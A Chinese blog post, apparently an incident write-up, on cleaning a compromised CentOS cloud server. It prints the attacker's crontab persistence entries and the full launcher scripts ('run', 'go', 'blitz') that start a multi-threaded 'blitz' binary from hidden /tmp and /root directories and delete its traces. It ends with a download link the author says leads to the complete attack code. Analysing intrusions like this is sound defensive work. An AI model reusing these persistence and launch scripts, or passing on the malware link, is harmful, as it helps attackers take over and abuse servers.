解决方法来自腾讯客服

https://cloud.tencent.com/document/product/296/9604,这是我们给您的建议,建议您排查下您的服务器情况

 

执行下crontab -l

[root@VM-0-14-centos c]# crontab -l
1 1 */2 * * /root/.configrc4/a/upd>/dev/null 2>&1
@reboot /root/.configrc4/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.configrc4/b/sync>/dev/null 2>&1
@reboot /root/.configrc4/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X291-unix/.rsync/c/aptitude>/dev/null 2>&1

查看内容:

[root@VM-0-14-centos c]# cat /tmp/.X291-unix/.rsync/c/aptitude
#!/bin/sh
cd /tmp/.X291-unix/.rsync/c
./run &>/dev/null

 

cat run显示如下内容

#!/bin/bash
PR=1
PR=$(cat /proc/cpuinfo | grep model | grep name | wc -l)

ARCH=`uname -m`
if [ "$ARCH" == "x86_64" ]; then
        if [ $PR -lt 7 ]; then
                sleep 15
                ./stop
                sleep 3
                RANGE=240
                s=$RANDOM
                let "s %= $RANGE"
                sleep $s
                #nohup ./golan >>/dev/null &
                #sleep 20m && 
                nohup ./go >>/dev/null &
        fi
        if [ $PR -gt 7 ]; then
                #sleep 15
                #./stop
                sleep 3
                #nohup ./golan >>/dev/null &
        fi
else
        #nohup ./golan >>/dev/null &
        #sleep 20m && 
        nohup ./go >>/dev/null &
fi

查看go脚本:

[root@VM-0-14-centos c]# cat go
#!/bin/bash
dir=`pwd`
cd $dir

threads=515

ARCH=`uname -m`
if [[ "$ARCH" =~ ^arm ]]; then
        threads=75
fi

if [[ "$ARCH"  == "i686" ]]; then
        threads=516
fi

cont=1

                while :
                do
                start=$(date +%s)
                touch v
                rm -rf p
                rm -rf ip
                rm -rf xtr*
                rm -rf a a.*
                rm -rf b b.*
                echo "257.287.563.234" >> c
                echo "257.287.563.234" >> c
                echo "sdaferthqhr34312asdfa" >> d
                echo "sdaferthqhr34312asdfa" >> d

                sleep $[ ( $RANDOM % 30 )  + 1 ]s
                timeout 6h ./blitz -t $threads -f 1 -s 12 -S 8 -p 0 -d 1 p ip
                sleep 3
                end=$(date +%s)

                if [[ $(($end-$start))  -lt "180" ]]; then
                        let threads=threads-50
                        let cont=cont+1
                        if [[ $(($threads))  -lt "80" ]]; then
                                                ./stop
                        fi
                        if [[ $(($cont))  -gt "6" ]]; then
                                                ./stop
                        fi
                fi

                rm -rf xtr*
                rm -rf ip
                rm -rf p
                rm -rf .out
                rm -rf /tmp/t*
                done
exit 0
[root@VM-0-14-centos c]# cat blitz
#!/bin/bash
SCRIPT_PATH=$(dirname $(readlink -f $0))
ARCH=`uname -m`
if [ "$ARCH" == "i686" ]; then
        $SCRIPT_PATH/blitz32 $*
elif [ "$ARCH" == "x86_64" ];   then
        $SCRIPT_PATH/blitz64 $*
fi

 

在执行 netstat -ano|egrep “tcp|udp”

 

完整攻击的代码已被我保存,空了的时候 在研究下这些坏人是怎么做的!!

下载地址:

https://www.aliyundrive.com/s/sS87xUzEmPP

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。